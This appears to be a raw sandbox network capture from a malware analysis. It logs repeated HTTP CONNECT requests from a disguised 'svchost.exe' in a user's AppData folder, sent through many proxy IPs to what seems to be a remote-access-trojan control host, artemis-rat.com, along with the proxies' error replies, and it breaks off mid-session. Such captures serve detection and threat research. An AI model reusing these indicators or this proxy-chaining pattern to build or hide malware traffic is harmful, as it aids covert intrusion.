                                                                                    Mar 9, 2024 13:14:38.342140913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3726192.168.2.561653117.160.250.134889956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.352312088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3727192.168.2.558812135.148.10.1616041543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.375518084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3728192.168.2.561856102.132.201.2028056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.410258055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3729192.168.2.56160842.61.48.219800056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.412471056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3730192.168.2.56194443.153.22.291000556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.421684027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.592870951 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:38.592909098 CET160INHTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl
                                                                                    Data Raw:
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3731192.168.2.561873103.66.177.173225143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.430948019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3732192.168.2.560618219.71.216.788043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.456794977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3733192.168.2.561901128.140.26.128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.461050034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.770378113 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.25.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3734192.168.2.561725111.53.178.249730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.462946892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3735192.168.2.561974104.21.194.198056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.465908051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.620454073 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3736192.168.2.56192446.17.63.166948056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.499603987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3737192.168.2.56192252.16.232.164312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.504873037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.815154076 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3738192.168.2.561890103.163.51.2548056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.517728090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3739192.168.2.562009104.16.106.658056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.524108887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.678124905 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3740192.168.2.56190313.234.24.116312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.535777092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3741192.168.2.562020104.25.230.2528056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.541217089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.695501089 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3742192.168.2.562028104.19.225.708056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.547743082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.701947927 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3743192.168.2.562029172.67.181.1368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.548767090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.703216076 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3744192.168.2.56201452.13.248.29312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.574240923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.767256975 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3745192.168.2.562054104.20.233.708056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.582847118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.737318039 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3746192.168.2.56182936.134.91.82888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.584981918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3747192.168.2.56195843.131.248.1651567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.586178064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3748192.168.2.56204934.49.208.2218056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.590820074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3749192.168.2.561953134.209.105.209312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.600893974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3750192.168.2.56206545.12.31.38056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.602118015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.756556988 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3751192.168.2.561995181.143.11.1571021956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.610377073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3752192.168.2.562069185.162.230.2018056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.610485077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.764806032 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3753192.168.2.561507140.238.25.2552100043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.634171963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3754192.168.2.56195265.1.40.47108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.635118008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3755192.168.2.562077104.22.1.1138056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:38.638767958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.793066025 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
